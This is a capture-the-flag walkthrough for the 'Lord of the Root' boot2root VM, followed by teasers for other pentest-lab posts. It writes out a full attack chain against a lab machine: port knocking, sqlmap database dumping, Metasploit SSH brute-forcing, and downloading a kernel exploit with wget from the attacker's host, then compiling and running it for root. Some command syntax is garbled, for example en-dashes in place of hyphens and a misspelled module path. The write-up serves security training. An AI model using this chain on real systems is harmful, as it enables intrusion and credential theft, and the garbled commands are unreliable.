Chuyển đến nội dung chính

Hack the Lord of the Root VM (CTF Challenge)

This is another Boot2Root challenge which has been prepared by KoocSec for hacking exercises. He prepared this through the inspiration of his OSCP exam. It is based on the concepts of great novel-turned-movie The Lord Of The Ring.
WalkThrough
Firstly, we will find our target.
netdiscover

Our target is 192.168.1.5
Now run the nmap script to know the ports and protocols.
nmap –p- -A 192.168.1.5

Nmap has resulted in showing us that only 22 port is open with the service of SSH. Port 80 is not open that means we don’t have facility of opening this server in browser. Therefore we will try to see what port 22 has to offer and so go to your terminal in Kali and type :
ssh 192.168.1.5
When I searched SSH it said “Knock Friend To Enter” and “Easy as 123” and then it asks for password that we do not know yet. Now this is a hinting towards port knocking. Let’s try it :
nmap –r –Pn –p 1,2,3 192.168.1.5
Here,
-r : is scanning ports consecutively
-Pn : is treating all hosts as online
-p : is only scanning specified ports
1,2,3 : ports (we used this because of the : easy as 1,2,3)
Now again fire up nmap scan. This time hopefully we will have more than one port in result.
nmap –p- -A 192.168.1.5

As you can see there is one more port open in comparison to our previous scan i.e. 1337 which has the service of HTTP and this is all we wanted as by default port 80 was not open. Let’s open our target IP with this port.
192.168.1.5:1337
It opens a page with only one image. There was nothing in the page source too. So, I used nikto here.
nikto –h 192.168.1.5:1337

Every directory shown in nikto’s result wasn’t useful. So, I tried robots.txt as I always try it by default.

And BOOM! I was right as an image opens here. And further I checked its page source.

In the page source I found a Base64 code which I decoded using HackBar.

And it gave me the result as shown above but here is a trick. It is going to be further decoded but only from L till = as this is the base64 coded string. Similarly, decode it further.
Upon decoding we have a URL. Lets open it.

And now we are face to face with a log in portal. Now here I will try to log in with any random username and password but I this process we will also capture cookies via BurpSuite.
As the cookies are captured, we will use them in our next step i.e. sqlmap. Now I wanted to gather database to know username and password that is why I decide to use sqlmap. And the command I used is :
sqlmap -u http://192.168.1.5:1337/978345210/index.php –forms –batch –crawl=10 –cookie=ibf29bpuc0864gmfobpdsg0pu0 –level=5 –risk=3 –dbs
When you execute this command it will ask you three questions. Answer first two questions as no and the third one as yes.
And it will start gathering database.

And finally it will show you the database of usernames and passwords.

Moving on save all of these usernames and password in two different text files. And use this text files in an SSH log in attack with the help of Brute force method. And to execute this attack go to the terminal in Kali and open Metasploit by typing msfconsole and further type :
use auxiliary/scanner/sh/shh_login
set rhosts 192.168.1.5
set user_file /root/Desktop/user
set pass_file /root/Desktop/pass
exploit
And as a result it will show you the correct username and password i.e. smeagol:MyPreciousR00t. now log in through SSH using this username and password.
Next give the password when asked. And when you are logged in then type the following command to know version of kernel.
lsb_release -a
The version is 14.04 and luckily we have an exploit for this version. In the Kali terminal lets search for the appropriate exploit and for this type :
searchsploit ubuntu 14.04
The exploit we will use here is 39166.c and for this exploit to be used we need to first download and compile it and for this type :
wget http://192.168.1.18/39166.c
gcc 39166.c –o shell
The first command in the above commands will download the exploit and the second one will compile it and save it in the file named shell. Next, we have to give permission to the shell and then at last we have to run it.
chmod 777 shell
./shell
Executing the shell file will take you to the root and to confirm this use the following command :
whoami
Now let’s get into root folder and see what it has to offer :
cd /root
ls
Here, we have found a text file with the name flag which was our ultimate goal. So now no more waiting, lets read it.
cat Flag.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast
Nhãn:

Bài đăng phổ biến từ blog này

Pentest lab - Metasploitable 2

Today I will walk through different ways of exploiting Metasploitable 2, the newer release of Rapid7’s popular vulnerable machine. First, what is Metasploitable? Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. In my lab environment, the IP of the attacker machine is 192.168.127.159, and the victim machine is 192.168.127.154. Since this is a test lab, I won’t be concerned about stealth. Instead, I will try to get the most information out of the scans. Let’s start by port scanning the target with nmap. I did a full port, aggresive scan against the target. Here are the results. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 ...
Đọc thêm

Metasploitable 2 vulnerability assessment

A vulnerability assessment is a crucial part in every penetration test and is the process of identifying and assessing vulnerabilities on a target system. In this part of the tutorial we will be assessing the vulnerabilities available on the network side of the Metasploitable 2 virtual machine. We will be assessing the web applications on the Metasploitable 2 machine in a later tutorial. In the previous Metasploit enumeration and fingerprinting tutorial we’ve learned that the Metasploitable 2 machine contains a lot of vulnerabilities. We have collected valuable information about the target system which we will be using to find known vulnerabilities both on- and offline. Exploitation of these vulnerabilities will be demonstrated in the next exploitation tutorial. In this tutorial we will be looking at a few different ways to perform vulnerability analysis. We will be manually searching for exploits, use scanning tools like Nmap with scripts and we will be...
Đọc thêm

CEH v9 (CEHVIETNAM.COM) - Hacking Metasploitable Lab

CEH v9 : Hacking Metasploitable VM In this guide, I will demonstrate how to root a Metasploitable 2 virtual machine. Metasploitable is an intentionally vulnerable Ubuntu machine. I’ll explore just a few of the many ways Metasploitable can be attacked, from vulnerabilities in common services to little known exploits and web vulnerabilities. I’ve set up Kali Linux and Metasploitable VMs in VirtualBox on the same network (bridged mode). Kali – 192.168.56.101 Metasploitable – 192.168.56.102 - Hãy thay IP của bạn cho thích hợp Contents   1 Footprinting 1.1 Ping 1.2 Traceroute 2 Scanning 2.1 Port Scanning 2.2 OS Fingerprinting 2.2.1 nmap 2.2.2 xprobe2 3 Enumeration 3.1 FTP (TCP 21) Enumeration 3.2 Telnet (TCP 53) Enumeration 3.3 SMTP (TCP 25) Enumeration 3.4 VNC (TCP 5900) Enumeration 3.5 X11 (TCP 6000) Enumeration 3.6 RLogin (TCP 513) Enumeration 3.7 IRC (TCP 6667) Enumeration 4 Exploitation 4.1 FTP Exploit 4.2 VNC Password Cracking 4.3 IRC E...
Đọc thêm